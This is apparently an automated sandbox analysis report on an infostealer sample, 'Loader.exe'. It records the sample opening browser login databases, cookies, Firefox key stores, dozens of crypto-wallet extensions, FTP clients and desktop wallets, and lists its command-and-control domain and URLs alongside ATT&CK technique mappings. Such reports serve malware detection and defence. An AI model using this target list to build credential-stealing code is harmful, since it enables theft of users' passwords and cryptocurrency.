                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares2
                Clipboard Data
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Loader.exe40%VirustotalBrowse
                Loader.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://cureprouderio.click/apiprog0%Avira URL Cloudsafe
                https://cureprouderio.click/pi0%Avira URL Cloudsafe
                https://cureprouderio.click/8D7Qw/Wo0%Avira URL Cloudsafe
                https://cureprouderio.click/api)0%Avira URL Cloudsafe
                https://cureprouderio.click/0%Avira URL Cloudsafe
                https://cureprouderio.click/piD0S0%Avira URL Cloudsafe
                https://cureprouderio.click/api90%Avira URL Cloudsafe
                https://cureprouderio.click/_00%Avira URL Cloudsafe
                cureprouderio.click0%Avira URL Cloudsafe
                https://cureprouderio.click/6CB0%Avira URL Cloudsafe
                https://cureprouderio.click/;00%Avira URL Cloudsafe
                https://cureprouderio.clic0%Avira URL Cloudsafe
                https://cureprouderio.click/8D7Qw/WoB0%Avira URL Cloudsafe
                https://cureprouderio.click/c0%Avira URL Cloudsafe
                https://cureprouderio.click/apiwn0%Avira URL Cloudsafe
                https://cureprouderio.click/api0%Avira URL Cloudsafe
                https://cureprouderio.click:443/api0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                cureprouderio.click
                172.67.132.7
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  cureprouderio.clicktrue
                  • Avira URL Cloud: safe
                  unknown
                  scentniej.buzzfalse
                    high
                    hummskitnj.buzzfalse
                      high
                      rebuildeso.buzzfalse
                        high
                        appliacnesot.buzzfalse
                          high
                          screwamusresz.buzzfalse
                            high
                            cashfuzysao.buzzfalse
                              high
                              inherineau.buzzfalse
                                high
                                prisonyfork.buzzfalse
                                  high
                                  https://cureprouderio.click/apitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabLoader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://cureprouderio.click/api9Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.entrust.net03Loader.exefalse
                                        high
                                        http://ocsp.entrust.net02Loader.exefalse
                                          high
                                          https://cureprouderio.click/6CBLoader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://cureprouderio.click/api)Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://cureprouderio.click/Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cureprouderio.click/piLoader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://x1.c.lencr.org/0Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cureprouderio.click/piD0SLoader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://crl.entrust.net/ts1ca.crl0Loader.exefalse
                                                        high
                                                        https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cureprouderio.click/_0Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.entrust.net/rpa03Loader.exefalse
                                                              high
                                                              http://aia.entrust.net/ts1-chain256.cer01Loader.exefalse
                                                                high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cureprouderio.click/8D7Qw/WoLoader.exe, 00000003.00000003.2145796817.0000000005365000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cureprouderio.click/apiprogLoader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaLoader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
